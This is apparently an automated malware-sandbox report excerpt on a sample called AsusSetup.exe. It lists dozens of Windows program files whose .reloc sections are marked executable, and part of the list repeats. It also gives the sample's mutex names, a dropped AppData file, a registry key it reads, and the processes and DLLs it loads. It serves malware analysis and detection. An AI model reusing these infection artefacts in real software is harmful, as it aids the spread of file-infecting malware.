Source: acrobat_sl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroTextExtractor.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADelRCP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVLP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OneDriveSetup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADNotificationManager.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeCollabSync.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WCChromeNativeMessagingHost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRLogTransport.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRWindowsClientService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Eula.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AsusSetup.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroTextExtractor.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADelRCP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVLP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OneDriveSetup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADNotificationManager.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeCollabSync.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WCChromeNativeMessagingHost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRLogTransport.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRWindowsClientService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Eula.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engineClassification label: mal96.spre.troj.expl.winEXE@6/129@93/19
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Users\user\AppData\Roaming\26169d80e67cd874.binJump to behavior
Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-26169d80e67cd8749ea72c54-b
Source: C:\Users\user\Desktop\AsusSetup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-26169d80e67cd8747d8e3ee9-b
Source: C:\Users\user\Desktop\AsusSetup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-26169d80e67cd874-inf
Source: C:\Windows\System32\FXSSVC.exeFile created: C:\Windows\TEMP\FXSSVCDebugLogFile.txtJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: AsusSetup.exeString found in binary or memory: </LAUNCH_ICON>
Source: AsusSetup.exeString found in binary or memory: </LAUNCH_BTN>
Source: unknownProcess created: C:\Users\user\Desktop\AsusSetup.exe "C:\Users\user\Desktop\AsusSetup.exe"
Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: oledlg.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: newdev.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: devrtl.dllJump to behavior
